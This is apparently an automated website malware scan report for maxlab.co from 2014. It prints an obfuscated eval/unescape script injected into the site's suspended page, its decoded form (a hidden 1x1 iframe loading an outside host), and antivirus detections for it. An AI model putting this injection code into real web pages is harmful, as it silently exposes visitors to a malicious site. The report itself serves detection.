New scan:

Malware Scanner report for maxlab.co

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://maxlab.co/
HTTP/1.1 302 Found
Connection: close
Date: Wed, 16 Apr 2014 16:22:02 GMT
Location: http://maxlab.co/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1
clean
http://maxlab.co/cgi-sys/suspendedpage.cgi
200 OK
Content-Length: 3808
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6B%65%76%66%65%72%2E%63%6F%6D%2F%3F%32%36%34%38%30%39%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));

Decoded script:


document.write('<iframe src="http://kevfer.com/?2648093" width=1 height=1></iframe>')
document.write('<iframe src="http://kevfer.com/?2648093" width=1 height=1></iframe>')
<iframe src="http://kevfer.com/?2648093" width=1 height=1></iframe>

Antivirus reports:

Avast
HTML:Iframe-inf
TrendMicro-HouseCall
Possible_Hifrm-5
TrendMicro
Possible_Hifrm-5
Microsoft
Trojan:JS/Iframeinject.K
NANO-Antivirus
Trojan.Url.IframeB.lbbln
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
GData
HTML:Iframe-inf
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen

http://maxlab.co/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Wed, 16 Apr 2014 16:22:02 GMT
Location: http://maxlab.co/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: maxlab.co

Result:
HTTP/1.1 302 Found
Connection: close
Date: Wed, 16 Apr 2014 16:22:02 GMT
Location: http://maxlab.co/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1

...226 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: maxlab.co
Referer: http://www.google.com/search?q=maxlab.co

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=maxlab.co

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://maxlab.co/

Result: maxlab.co is not infected or malware details are not published yet.